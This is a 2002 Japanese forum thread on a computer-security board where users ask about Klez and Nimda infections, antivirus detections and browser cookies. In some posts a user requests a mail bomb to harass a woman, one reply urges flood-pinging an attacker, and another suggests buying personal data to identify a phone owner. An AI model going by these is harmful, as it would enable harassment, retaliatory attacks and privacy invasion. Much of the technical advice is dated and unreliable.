>>734 1つの詐称アドレスを使い続けるのかは確証がないので答えにくい。
気になるなら閉鎖環境で感染させて調べてみてくれ(w

Klezは自前のSMTPで送信するので感染後はOEの起動は関係ない。Windowsの起動時。こ
れはシマンテックやトレンドマイクロのサイトでわかること。
答えにくいことや調べればわかる質問は放置されるぞな。放置に理由あり。

748 :さおり:02/09/02 16:46
>745さん。
ありがとうございました。
以前変なリンクをクリックしたらホモのブラクラ
に引っかかったのでその時ですね。
ほっておいても大丈夫そうですねー


749 :しょぼいやつ:02/09/02 17:18
昔から女にはもてなかったが、昨日はひどいいわれかたで馬鹿にされた
同じように女に馬鹿にされつづけた人俺の復讐に協力してくれ
こんなむかつく女に携帯が使えなくなるようにメールボムを送ってやたい

750 :やりたいなら、自分でやれ:02/09/02 17:21
>>749
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

751 :名無しさん@お腹いっぱい。:02/09/02 17:33
>>749
本当にしょぼいやつ(w

752 :教えてください:02/09/02 21:32
2ちゃんのレスの名前のところをクリックすると、時々自分のアドレスに登録している情報が載っていることがあるんですけど…
これってやっぱりウィルスですよね。
どなたか解決策を教えてください


753 :cheshire-cat ◆CATJR.v6 :02/09/02 21:48
>>752
クッキー???

754 :教えてください:02/09/02 21:56
返答ありがとうございます。
そもそもクッキーって名前はしっているけど、どういうものかしらないほどのど素人なものでして…
もっと勉強しなきゃだめですかね?
こっちがPC原人じゃ説明しようもないでしょうし。
すんませんです

755 :cheshire-cat ◆CATJR.v6 :02/09/02 21:59
>>754
ブラウザから設定できるクッキー。
IE6ならプロパティ→全般タブ→インターネット一時ファイル→Cookieの削除、かな。

ちゅうか漏れ、検証していないんだけど(だってどの板かわからんし、2chにクッキー取られたくないし
どでしょ。

756 :教えてください:02/09/02 22:15
>>755E-mail
まずは返答ありがとうございます。ためしてみます。
一応具体的に述べますと、「E-mail」のところにスペースをいれた書き込みにかぎり、そのE-mailにメールアドレスからランダムで名前が乗るような症状です(ちなみにこのレスのE-mailにもスペースを入れいております)。
トレンドマイクロにも聞いてみたのですが、「よくわからん」との返答でした…
こういうウィルス(?)などに対してはノートンやウィルスバスターを購入すればいいのでしょうか?
自分のような無知な人間はウィルスHPに書いているような対策は知識がなさすぎて実行できないものでして。
なにかいい製品がありましたら、ご紹介いただければ幸いです。
でも、面倒な場合はレスは結構です。
本当にありがとうございました。

あと、あげてしまってすみません。


757 :cheshire-cat ◆CATJR.v6 :02/09/02 22:19
>>756
漏れそゆ症例、知りませぬ。
メアド抜きなんてブラウザの設定を固めていれば、まず無いことだし。クッキー抜きとか、Java Scriptの設定を甘くしていると、抜かれたりすることはありまするが。

お力になれずにスマンっす。

758 :名無しさん@お腹いっぱい。:02/09/02 22:26
本当にありがとうございました。
親切に対応していただきまして、ただただ感謝です。
いただきました意見を参考にさせていただきたく思います。
どうもありがとうございました。


759 :名無しさん@お腹いっぱい。:02/09/02 22:37
これのことか?

760 :名無しさん@お腹いっぱい。:02/09/02 22:54
どれ?

761 :名無しさん@お腹いっぱい。:02/09/02 23:02
>>752
で、何をもって君はウィルスと決めつけたのだ?
トレンドマイクロにTELして仕事の邪魔して迷惑かけるより
初心者板の過去ログ見なさい。何度も出とる。
ここじゃ板違い。

762 :名無しさん@お腹いっぱい。:02/09/02 23:08
>>752
>>761
名前のところをみれ!!

763 :ここを見ろ:02/09/02 23:47
>>752
>>760

764 :名無しさん@お腹いっぱい。:02/09/03 00:04
すまん、愚痴らせてくれ........

Klezが50通くらい来た(webメールは"壊れたメール"で一杯で激重に)
んで、ヘッダ見たら最下段のReceiveとReturn-Pathが2通を除いて同一
だった。
これは間違いないだろと思ってメルアド検索したら
HPに辿り着いた。(geocities.co.jp/MusicHall-Horn/5237/ )

掲示板に何度も警告を書いたが何度やっても消された。
その間にもわらわらウィルスは来る。
そして、数日後本人はようやく気付いたようだった。
その時の奴の掲示板での一言。


765 :764:02/09/03 00:05
>泣いちゃうわ!
>
>今ハヤリの「klez」とかってヤツに感染してもうた!!!
>♪あ〜あ やんなっちゃった〜 あ〜あ 驚いた♪(by牧伸二)
>もしかしたらklezを作ったヒトがここ読んでるかもしれないから言って
>おくけど(まずありえんけどな)、こんなすごいウイルスつくるくら
>いの頭脳があるなら、もっと有効な使い方をしなさい!!
>みなさんもご用心♪
>
>遅れたけどおニャン子再結成おめでとう。

これじゃウィルスが無くなるわけがない。
コイツン中じゃ Klez=おニャン子再結成レベル。
こんなんばっかなのか?
そして、その後3日間きっちりとウィルスは来た。

鬱だ。

プロバは、片手間にCATVやってる業者でメールも読んでないみたいで
返事はねぇし。鬱だ。

長文スマソ。読み流してくれ........逝ってくる


766 :名無しさん@お腹いっぱい。:02/09/03 00:06
しらない間にアイコンが別のものに変わってるんですが、
これはウイルスですか?

767 :名無しさん@お腹いっぱい。:02/09/03 00:10
>>764
ンデ、お宝添付ファイルは何か有ったのか??
まさか、50通もそのまま捨てたんぢゃ無いだろうな。。
・・・・モッタイナイ

768 :767:02/09/03 00:19
>>764
エクセルで顧客のメアド管理してるアダルトグッズの通販業者からなら面白いのにな。
Klez.Hのばあい。


769 :名無しさん@お腹いっぱい。:02/09/03 03:54
>>764相手の馬鹿さ加減は見届けてやったから元気出してがんがれ

770 :名無しさん@お腹いっぱい。:02/09/03 16:50
コンピューターウイルス集めDB化 総務省、対策研究
http://www.asahi.com/national/update/0903/018.html

…住基ネットに流出しないことを祈るばかりだ(w

771 :名無しさん@お腹いっぱい。:02/09/03 23:28
>>770
>計画では、研究機関や企業に呼びかけて体制を組む。実際に出回っているウイルスを
企業や個人から提供してもらうほか、

モ、漏れのコレクション、、、ヒトクチ幾らで買ってくれるかな。。。。
つか、自作ウイルスとか買ってくれるんかな...

サイト作ってアピールするかな ハァハァ・・・・

772 :名無しさん@お腹いっぱい。:02/09/04 18:29
>ウイルス対策のワクチンソフトや感染をチェックするソフトの開発を手がける企業と競合して
>「民業圧迫」と批判を招かないよう、研究のための情報の蓄積や提供にとどめるという。

骨抜きの悪寒…

773 :cheshire-cat ◆CATJR.v6 :02/09/04 19:36
>>771
一攫千金。。。。。にゃ
>>772
そ言えば、日本国内のアンチウイルスソフトベンダーって、「株式会社山田洋行」だけだったような記憶。
あ、ブックマークが死んでる。

774 :名無しさん@お腹いっぱい。:02/09/04 21:03
お気に入りのフォルダから2ちゃんの自作板を選択して
http://pc3.2ch.net/jisaku/)を開いただけでノートンが反応し
Macro.srcに感染しました修復できませんってメッセージが出ました。
どうしてこうなっちゃったのか??です。
¥LocalSettings\TemporaryInternetFiles¥ContentIE5¥0123H67¥jisaku2
はMacro.srcウィルスに感染しています。
このファイルを修復できません。ってスキャンしたら出ました。


775 :名無しさん@お腹いっぱい。:02/09/04 21:13
>>774 ( ´,_ゝ`) プッ

776 :cheshire-cat ◆CATJR.v6 :02/09/04 21:22
>>774
誤検出らしですけど。

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

777 :774:02/09/04 21:43
>>776
ありがとう、そのようですね。
慌てて過去ログ読んでいませんでした。
でもトップページで誤検出するとは、まいりました。


778 :名無しさん@お腹いっぱい。:02/09/04 22:30
すいません、番組実況板や自動車板等の2ちゃんの特定の板に逝くと
マイクロメディアからフラッシュ6をダウンロードしる!みたいなのが
毎回確実に出るんですが、これってウィルスとかの可能性ありますか?
マジで困ってるので教えてください

779 :名無しさん@お腹いっぱい。:02/09/04 22:37
インターネットセキュリティーが先ほどから高危険度の通信を浮けまくってます。
IPが何個かわかるのですが、そのIPから相手を特定すると買ってできるのですか?
もしよければここに吊るし上げます。
本当に次から次へ来て、困っています。
環境はwin2000です。


780 :cheshire-cat ◆CATJR.v6 :02/09/04 22:49
>>778
多分、フラッシュの広告が2chに導入されたってことなんではないでしょか。
ちゅか、無視しれ。
どこのURLかわからんので、漏れは見ておりませぬ。
そゆ点はご自身で検証してくだされ。

>>779
情報不足。




781 :名無しさん@お腹いっぱい。:02/09/04 22:50
>>778バージョンアップしろ
まさかフラッシュプレイヤーが何かしらんとかいう馬鹿じゃないよな?

>>779無視しろ
Whoisとかで相手はわかるが、だからどうしたという程度のもの
吊るし上げるつったって、この板じゃそんなオナニー野郎は無視されるだけ
やるならPingを10000回くらい打ち返せ

782 :名無しさん@お腹いっぱい。:02/09/04 22:51
>>779
どこがウイルスなのかと。

783 :778:02/09/04 22:53
>>780-781
ってことは、安心していいってことでしょうか?

784 :名無しさん@お腹いっぱい。:02/09/04 22:54
Ping1000000回打ち返すぐらいの気概が欲しいね

785 :778:02/09/04 22:54
それとなぜ2ちゃんのある特定の板でしか出ないのかわかりません。

786 :名無しさん@お腹いっぱい。:02/09/04 22:54
>>778オナニーは半角板でやれってこと

787 :名無しさん@お腹いっぱい:02/09/04 22:56
[アプリ] CD革命6.0 Virtual Pro(win2k+Win9x+XP対応)(1)をwinMXでダウソしたんですが、
winMX落としてはいけないものリスト http://mxtrojan.tripod.co.jp/ によると、再起動後、
全HDDを消去とあります。zipをおとしただけなら大丈夫でしょうか?削除したほうがいいですか?
なにとぞ教えてください。おながいします。

788 :778:02/09/04 22:58
>>786
いや、素に困ってるんですが・・

789 :名無しさん@お腹いっぱい。:02/09/04 23:23
>>788
じゃあふざけるな

790 :778:02/09/04 23:26
>>789
ええー!?
どこもふざけてませんよ。


791 :名無しさん@お腹いっぱい。:02/09/04 23:28
>>787
MX関連は自己責任でどうぞ。

792 :787:02/09/04 23:32
>>791 すみません。消します。はぁ〜。

793 :名無しさん@お腹いっぱい。:02/09/04 23:32
ここで聞くのか携帯板がいいのか迷ったんですが・・・
最近携帯メール宛にウィルスメールと思われるものが来ます。
内容はエラーメッセージで、添付ファイル付き。
ドコモユーザーのため添付ファイルは自動的に削除されるので
どんなファイルなのか分からないのですが
読んだだけでも感染するとかってあるんでしょうか?
そもそも携帯メールのウィルスって周りじゃ聞いたことがないんですが
詳しい方がいらっしゃったら教えて下さい。

794 :名無しさん@お腹いっぱい。:02/09/04 23:36
よーく考えろ
Windows用にかかれたウィルスが携帯で実行できるかを

795 :名無しさん@お腹いっぱい。:02/09/04 23:43
VirtualPC for DoCoMo

796 :名無しさん@お腹いっぱい。:02/09/04 23:55
>794、795さん
すいません、私、全然詳しくないので考えても分からないです・・・
ごめんなさい。
実行出来ない、ということでよろしいんでしょうか?
それとも有り得るという意味なんでしょうか?
うっかりメールを読んでしまったので不安です。

797 :cheshire-cat ◆CATJR.v6 :02/09/04 23:58
>>795
あったら面白いかも。
でもバシリスクのエラーまみれで、エミュを業務に使うにあたっての限界を感じた。

798 :名無しさん@お腹いっぱい。:02/09/04 23:59
>>796
ウィルスといってただのプログラム
PS2のソフトがファミコンで動くか?
それと同じ事

799 :742:02/09/05 00:15
PC初心者板でも質問したのですが、
イマイチわからなかったので教えてください。

ノートンのリアルタイムスキャンで W32.Nimda.enc が引っかかります。
最近、毎日のようにひっかかります。
メーラーはOEですが、OEを常駐させていないときでも、突然
「C:\DOCUMENTS AND SETTINGS\ALL USERS\DOCUMENTS\# XXXX.eml」
に発見されたと言われます。
毎回自動隔離されているんですが、頻繁に起こるものなので・・・。

ノートン定義ファイルは最新版です。
隔離しても、ウイルスは有効で、かつPCをほうっておいても
リアルタイムスキャンによるウイルス検出が起こる・・・
こういうもんなんでしょうか?

ご教授の程、お願いします。



800 :名無しさん@お腹いっぱい。:02/09/05 00:18
手動でnimdaが添付されてるらしきメールを削除

801 :799:02/09/05 00:21
>>800
プレビュー機能を切って、OE上で・・・ということですか?
つまりマイドキュメント内で発見されるemlファイルは、
ニムダ本体によって定期的に生成されていて
ノートンはそれに反応している・・・という解釈でよろしいですか?

普段はバスターオンラインも反応しない・・・
バスターオンラインはダメなんですね・・・。

ありがとうございます。


802 :名無しさん@お腹いっぱい。:02/09/05 00:25
>つまりマイドキュメント内で発見されるemlファイルは、
>ニムダ本体によって定期的に生成されていて
>ノートンはそれに反応している・・・という解釈でよろしいですか?
感染してるわけじゃないんだから、んなわけない

803 :799:02/09/05 00:26
>>802
ではなぜマイドキュメントでウイルスが発見されるんでしょうか・・・!?

804 :名無しさん@お腹いっぱい。:02/09/05 00:39
>>803感染してんじゃネーノ?

「Nimda !! 」【その4】
http://pc.2ch.net/test/read.cgi/sec/1001864573/-100

シマンテック見てきたけど
削除ツール使わんと完全削除されない可能性ありって書いてるし
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.e%40mm.html

805 :799:02/09/05 00:46
>>804
ノートン最新定義ファイル
バスターオンライン
シマンテックオンライン

これらではPC内スキャンしても発見できませんでした。
時々リアルタイムスキャンでW32.Nimda.encが引っかかる。
マイドキュメントかマイピクチャーで。
専用駆除ツールを使わないと見つけることさえできない、と・・・!?

おそろしい・・・。

806 :名無しさん@お腹いっぱい。:02/09/05 01:12
>>805
アンチドート簡易版は
フリーで検出のみだけど799さん感染してるなら
ちょっとこいつで実験してみてくれないか?
ノートン並の検出率のソフトなんだけど。

http://www.vector.co.jp/soft/win95/util/se108623.html

807 :名無しさん@お腹いっぱい。:02/09/05 01:20
>>799
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.ipa.go.jp/security/topics/newvirus/nimda_01.html

見過ごされやすいが、.eml、.htmなどの拡張子を持つウィルスの素は、
Explorerをサムネイル表示させてると、思わぬところで感染することがあるよ。
これで、PostPetユーザの知人のマシンがメールの添付ファイルを実行せずして、
VBS.Haptime.Aに感染した。パッチあててなかった当人も悪いんだけどね。

808 :名無しさん@お腹いっぱい。:02/09/05 01:22
してみると、いくら流行ってるとはいえ
klezが危険度4で、nimdaが危険度3ってのは納得いかんね

809 :キヤノン(Canon)インターネットサービスは第三者中継を行います:02/09/05 01:54
キヤノン(Canon)インターネットサービスは第三者中継を行います。
http://www.canonet.ne.jp/
http://www.canonet.ne.jp/service/kaka_00.html
ホスティングサービスなどがあるが大丈夫か??????

http://www.nanet.co.jp/rlytest/relaytest.html
www.canonet.ne.jp (pri=10)
問題あり:不正な中継を受け付けます。
(202.228.190.225)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

810 :809 不正中継ホストとして登録されています:02/09/05 01:55
http://www.ordb.org/lookup/?host=www.canonet.ne.jp
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: www.canonet.ne.jp (202.228.190.225)
ORDB.org への初回登録日時: 2002-08-19 00:44 GMT
初回送信ホスト: 195.82.124.110
最終検査日時: 2002-08-19 00:44 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from www.canonet.ne.jp (www.canonet.ne.jp [202.228.190.225])
by BocksCar.ORDB.org (Postfix) with ESMTP id 6E3435C47
for ; Mon, 19 Aug 2002 00:44:30 +0000 (GMT)
Received: from localhost.localdomain (ns.fgnet.dk [212.242.88.2])
by www.canonet.ne.jp (8.11.1/3.7W-01032503) with ESMTP id g7IMiQQ30724
for ; Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Date: Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Message-Id: < 200208182244.g7IMiQQ30724@www.canonet.ne.jp >
From: spamtest@canonet.ne.jp
To: marvin%marvin.ordb.org@canonet.ne.jp
X-ORDB-Envelope-From: spamtest@canonet.ne.jp
X-ORDB-Envelope-To: marvin%marvin.ordb.org@canonet.ne.jp
Subject: ORDB.org check (0.2807038021476490.2895395453) ip=202.228.190.225

811 :809 ここで判明:02/09/05 01:56
ここで判明
只今までに検出されたウィルス 本日分(リアルタイム更新)
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
2002-09-04 09:53:49 W32.Klez.H@mm < 20020904005344.66C4C1F48E7@inner2.canonet.ne.jp >
2002-09-04 13:49:08 W32.Klez.H@mm < 20020904044903.F0E8C4C6C6@inner2.canonet.ne.jp >
2002-09-04 23:42:31 W32.Klez.H@mm < 20020904144225.5DC424C6D7@inner2.canonet.ne.jp >

812 :名無しさん@お腹いっぱい。:02/09/05 01:58
>>808
確かに。
『感染しました』っていうと、『初期化をお勧めします』が一般的なんだけど、
初期化直後は穴だらけで怖いってことも十分教えて欲しいね。
その怖さが身にしみている人は、↓これから目が離せないんじゃないかな。

http://www.cert.org/advisories/
http://www.microsoft.com/japan/technet/security/current.asp
http://windowsupdate.microsoft.com/

813 :名無しさん@お腹いっぱい。:02/09/05 02:00

   ∧_∧  / ̄ ̄ ̄ ̄ ̄
  ( ´_ゝ`)< ふーん
  (    )  \_____
  | | |
  (__)_)



   ∧_∧  
  ( ´,_ゝ`)プッ
  (    )
  | | |
  (__)_)



814 :名無しさん@お腹いっぱい。:02/09/05 02:03
>>809-811

815 :名無しさん@お腹いっぱい。:02/09/05 02:07
>>809-811
お前すげーうざいんだけど。

816 :799:02/09/05 12:12
>>806
了解です。
チェックしてきます。

>>807
いえ、それはわかるのですが、
なぜノートン&バスターオンラインでは反応しないのかな・・・と。


817 :807:02/09/05 12:51
>>799 >>816
こんなのあったね。
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html

W32.Nimda.(Aor亜種)感染メールから添付ファイルを検疫した後の
残骸本文を検出したのか、W32.Nimdaの脅威を持つ新たな亜種を検出したのか、
どっちかということらしい。

> OEを常駐させていないときでも、突然・・・
もともとWindows自体にそういう挙動があるからね。
感染・懐疑ファイルにアクセスしようとするものがあれば、
当然、Nortonは割って入るだろうね。

それと、アンチウィルスが何か検知したらしい場合は、
掲示板で尋ねるのではなく、ベンダーのウィルス情報ページで調べ、
判らなければ、ベンダーに問い合わせるのが基本ではないかな?
このプロセスによって、新種・亜種が確認される場合もあり得るわけだから。

818 :778:02/09/05 15:33
なんか上の方で安全とか言われてたんですが・・
ダウンロードした直後にウィルススキャンしたら
やっぱウィルスだったみたいなんですが・・。

819 :名無しさん@お腹いっぱい。:02/09/05 16:00
圧縮されてるものを解凍するだけじゃ
絶対にウイルスに感染することは
ないんでしょうか?

820 :名無しさん@お腹いっぱい。:02/09/05 16:07
>>819
ある

821 :名無しさん@お腹いっぱい。:02/09/05 16:10
>>820
ありがとう。

822 :股、北!!!!!!so-netからasahi-itを通じてKlez:02/09/05 16:33
股、北!!!!!!so-netからasahi-itを通じてKlez
http://www.asahi-it.com/
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com) (210.174.168.200)
by **; 04 Sep 2002 21:37:18 +0900 (JST)
Received: from Ovxg (p294b5b.kngwnt01.ap.so-net.ne.jp [218.41.75.91])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g84Cb0034612
for < ds@dealsweeps.virtual0.net >; Wed, 4 Sep 2002 21:37:00 +0900 (JST)
Date: Wed, 4 Sep 2002 21:37:00 +0900 (JST)
Message-Id:< 200209041237_g84Cb0034612@asahi-it.com >
From: bac < bacsan____________@mail.hinocatv.ne.jp >
To: p294b5b_kngwnt01_ap_so-net_ne_jp_Klez@asahi-it.com
218_41_75_91_Klez@asahi-it.com
asahi-it_com_p294b5b_kngwnt01_ap_so-net_ne_jp_Klez@so-net.ne.jp
asahi-it_com_218_41_75_91_Klez@so-net.ne.jp
200209041237_g84Cb0034612@asahi-it.com
Subject: Hello,ds,congratulations

asahi-it.com Klezを検索すると、
http://www.scramble-egg.com/virusinfo.htm
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
が引っかかる。

823 :名無しさん@お腹いっぱい。:02/09/05 17:58
>>778ならMacroMediaに言え

824 :名無しさん@お腹いっぱい。:02/09/05 17:59
            i⌒i スッ
             | 〈 
      ∧_∧ / .フ
      ( ´_ゝ`)/  |  
    /     /.  ノ
   / /\   /   |
 _| ̄ ̄ \ /.  ノ__
 \ ̄ ̄ ̄ ̄ ̄ ̄>>822
  ||\             \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||  ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||



  帰宅してくださいよ。
.               |
      ∧_∧     ||
      ( ´_ゝ`).   |||
    /     \.   |||| バチーン!!
   / /\   / ̄\ ┻||||      .'  , ..
 _| ̄ ̄ \ /  ヽ \从// ・;`.∴ '     
 \ ̄ ̄ ̄ ̄ ̄ ̄ \__) < ,:;・,‘  
  ||\            \ .   ’ .' , ..
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

825 :名無しさん@お腹いっぱい。:02/09/05 22:23
JS.Trojan.Cardst
というウイルスにかかってしまいました
最近ダウンロードしたファイルはkageぐらいしか思いつきません
現時点での疑問点に答えていただけると助かります

1.ウイルス対策ソフトは持っていないのですが、駆除できますか?
2.現時点で他人に迷惑かけている可能性ありますか?
3.ウインドウズを再インストールしたら駆除できますか?
  (ウイルス対策ソフトを買うべきですか?)



826 :名無しさん@お腹いっぱい。:02/09/05 22:41
825に追加です
フリーのアンチドートの検索結果では、

C:\WINDOWS\Temporary Internet Files
\Content.IE5\SL6V09M7\index[2].htm = ウイルス感染 : Trojan.JS.Cardst

とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません


827 :名無しさん@お腹いっぱい。:02/09/05 22:42
> 2.現時点で他人に迷惑かけている可能性ありますか?
ありますね...

828 :cheshire-cat ◆CATJR.v6 :02/09/05 22:43
>>825-826
デスクトップのIEのアイコンをマウス右押し→全般→インターネット一時ファイル→ファイルの削除。



829 :名無しさん@お腹いっぱい。:02/09/05 22:44
>826
>とでるのですが、\Temporary Internet Files以下のフォルダが見つかりません

隠しファイルは表示してる?

830 :825=826:02/09/05 22:59
>>827
知らないうちにあっちこっちにメールが届いてたりします?

>>828
試したけど残ってました

>>829
表示してます

831 :825=826:02/09/05 23:13
その後トレンドマイクロのオンラインスキャンで
C:\WINDOWS\Temporary Internet Files
を検索したら引っかかりなかったけど
アンチドートだと感染してました。どうしよう・・・

832 :名無しさん@お腹いっぱい。:02/09/05 23:13
>>830
マイコンピューターから開くとフォルダ表示されないけど
エクスプローラーで見ると出てくるよ。
それか検索で削除とか。

833 :名無しさん@お腹いっぱい。:02/09/05 23:21
JS.Winbomb.d
というウイルスにかかって
ノートンで検疫したんですが
修復できないので、削除したらいいんですか?
削除して何か問題がおきたりしませんか?

834 :825=826:02/09/05 23:39
>>832
消えました。アンチドートでも引っかからなかったです
ありがとうございました

ところで、
C:\WINDOWS\Temporary Internet Filesの下のフォルダに
大量のファイルが眠っていたのですが消していいのでしょうか
HTML、JPEG、ZIP、サイズ0のファイルと盛りたくさんだったのですが

835 :名無しさん@お腹いっぱい。:02/09/05 23:58
ウイルスに感染した場合初期化して購入時に戻してしまえばウイルスは完全に消えてしまうのですか?
どうしても削除できない場合なんかは初期化するわけですが・・・

836 :名無しさん@お腹いっぱい。:02/09/06 00:19
>>835
BIOS感染型の場合は無理です。

837 :名無しさん@お腹いっぱい。:02/09/06 01:14
>>834 消してもいいと思う。

838 :名無しさん@お腹いっぱい。:02/09/06 01:16
>>833 削除していいよ

839 :名無しさん@お腹いっぱい。:02/09/06 02:38
>>838
ありがとうございます。
返事遅くなってすいません。
すぐ削除します。


840 :名無しさん@お腹いっぱい。:02/09/06 04:02
>>793
亀レスだが、携帯電話平気。
携帯電話感染ウイルスがあったら大変なことになっている。
携帯上から見るリモートメールでパソコンに来ているウイルス付きメールを見ても、
パソコンも携帯電話も感染しないと思う。

841 :名無しさん@お腹いっぱい。:02/09/06 10:45
なんか最近ここみてるとセキュリティ警告というのがしきりに出るんですが、
なんなのでしょうか?

842 :名無しさん@お腹いっぱい。:02/09/06 11:12
友人から英語だらけで読めないメールが何度もきます。
友人に聞くと送ってないといわれました。
これってウイルスですか?
教えてください
( ̄人 ̄)オ・ネ・ガ・イ♪

843 :名無しさん@お腹いっぱい。:02/09/06 11:43
>>841
さんざん既出

844 :只今までに検出されたウィルス:02/09/06 11:52
只今までに検出されたウィルス
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_2.txt
2002-06-20 10:22:07 W32.Klez.H@mm< 200206200116_KAA89502@smtp.interq-office.ne.jp >
2002-06-20 10:23:45 W32.Klez.H@mm< 200206200117_KAA89564@smtp.interq-office.ne.jp >

このホストは ORDB.org に不正中継ホストとして登録されています。
http://www.ordb.org/lookup/?host=smtp.interq-office.ne.jp
データベースの検索結果: smtp.interq-office.ne.jp (211.125.80.40)
ORDB.org への初回登録日時: 2002-05-09 07:10 GMT
初回送信ホスト: 64.90.162.91 spam submitted to Spamcop
最終検査日時: 2002-09-05 17:32 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from smtp.interq-office.ne.jp (unknown [211.125.80.40])
by BocksCar.ORDB.org (Postfix) with ESMTP id 0CF16557F
for ; Thu, 5 Sep 2002 17:32:22 +0000 (GMT)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by smtp.interq-office.ne.jp (8.9.3/Wang/19990809) with ESMTP id CAA17402
for <@[211.125.80.40]:marvin@marvin.ordb.org>; Fri, 6 Sep 2002 02:30:58 +0900 (JST)
Date: Fri, 6 Sep 2002 02:30:58 +0900 (JST)
From: spamtest@211-125-80-40.marugoto-server.com
Message-Id: < 200209051730.CAA17402@smtp.interq-office.ne.jp >
To: "@[211.125.80.40]":@smtp:marvin@marvin.ordb.org
X-ORDB-Envelope-From: spamtest@211-125-80-40.marugoto-server.com
X-ORDB-Envelope-To: @[211.125.80.40]:marvin@marvin.ordb.org
Subject: ORDB.org check (0.04072457706236320.687950450) ip=211.125.80.40

845 :844 まるごとserverは危険!!!!!?????:02/09/06 11:53
まるごとserverは危険!!!!!?????
http://www.marugoto-server.com/ (=http://www.interq-office.ne.jp/)
プランと料金 http://www.marugoto-server.com/service/

ほかのホストの状況
http://www.ordb.org/lookup/?host=ns1.interq-office.ne.jp
http://www.ordb.org/lookup/?host=ns2.interq-office.ne.jp

846 :844 Operating System and Web Server:02/09/06 11:55
Operating System and Web Server for www.marugoto-server.com
http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=www.marugoto-server.com
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.3.26 (Unix) 7-Jul-2002 210.225.108.66 Interq Corporation
FreeBSD Apache/1.3.9 (Unix) 22-Jan-2001 210.225.108.66 Interq Corporation

グローバルメディアオンライン株式会社
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=211.125.80.0-211.125.95.0
インターキュー株式会社
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.225.108.64/26
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=SM1542JP
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.225.108.0

847 :名無しさん@お腹いっぱい。:02/09/06 11:56
        |                    |
        |                    |
        |                    |
        |   >>844 帰 宅 せ よ    .|
        |                    |
        |                    |
        |___________∩____と⌒i
        (~ヽ            ||      | |
          \\          / /     / /
           \\   _∧_∧ / /∧_∧/ /
            \\/( ´_ゝ`) /( ´,_ゝ`) /
              \UJ     (      /
                \     \    |
                 \      \  /
                   )      )(___
                 /  ,.   /      )
                /  /(  (  ̄ ̄ ̄(.  |
              /  /  |\ \     |  |
             /   (   ノ  |\ \   ) |

848 :名無しさん@お腹いっぱい。:02/09/06 11:57
>>844うざい死ね

849 : :02/09/06 15:11
        |                    |
        |                    |
        |                    |
        |   >>847 帰 宅 せ よ    .|
        |                    |
        |                    |
        |___________∩____と⌒i
        (~ヽ            ||      | |
          \\          / /     / /
           \\   _∧_∧ / /∧_∧/ /
            \\/( ´_ゝ`) /( ´,_ゝ`) /
              \UJ     (      /
                \     \    |
                 \      \  /
                   )      )(___
                 /  ,.   /      )
                /  /(  (  ̄ ̄ ̄(.  |
              /  /  |\ \     |  |
             /   (   ノ  |\ \   ) |


850 :名無しさん@お腹いっぱい。:02/09/06 15:46
>>844-846
お前が貼ってるのって、全く意味がないからやめろ。

851 :困っています:02/09/06 15:50
唐突にくだらない質問で申し訳ありませんが
携帯電話の番号だけからやりようによっては
その持ち主の情報で解る事はあるのでしょうか?
どなたかご回答宜しくお願いします。

852 :名無しさん@お腹いっぱい。:02/09/06 15:53
>>851
くだらない質問だけでなく
さんざん既出

853 :名無しさん@お腹いっぱい。:02/09/06 15:55
>>851
スレ違い

854 :b:02/09/06 15:58
http://profiles.yahoo.co.jp/tengaiten2002

855 :困っています:02/09/06 16:14
そうでしたか、それは申し訳ありませんでした。
それで重ね重ね申し訳ないのですが
どのスレッドに解答があるのでしょうか?
本当に本当に申し訳ないのですが
教えて下さい

856 : :02/09/06 19:22
http://www.google.com/search?q=%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7%E3%81%8B%E3%82%89+%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1+site:2ch.net&sourceid=opera&num=0&ie=utf-8&oe=utf-8


どうせろくでもないことを考えているんだろうが



857 :名無しさん@お腹いっぱい。:02/09/06 21:06
名簿屋から買う

858 :名無しさん@お腹いっぱい。:02/09/06 21:48
いきなりPCのデータ消えました、ウィルスみたいです、どうしたらいいですか?

みたいな書き込みがいっぱいあると思ったんだけど・・・
きっちり仕事してんの?>>klez

859 :名無しさん@お腹いっぱい。:02/09/06 21:51
今日破壊活動をするのはKlez.Eだけ。
Klez.Hは関係ない。

860 : :02/09/07 00:20
irc.scenecritique.com:8888
http://opennap.scenecritique.com
チャットではMXとIRCクライアント(チャンネル作成可能)が、互いに
会話できます。週末はにぎわいますので是非お越し下さい。

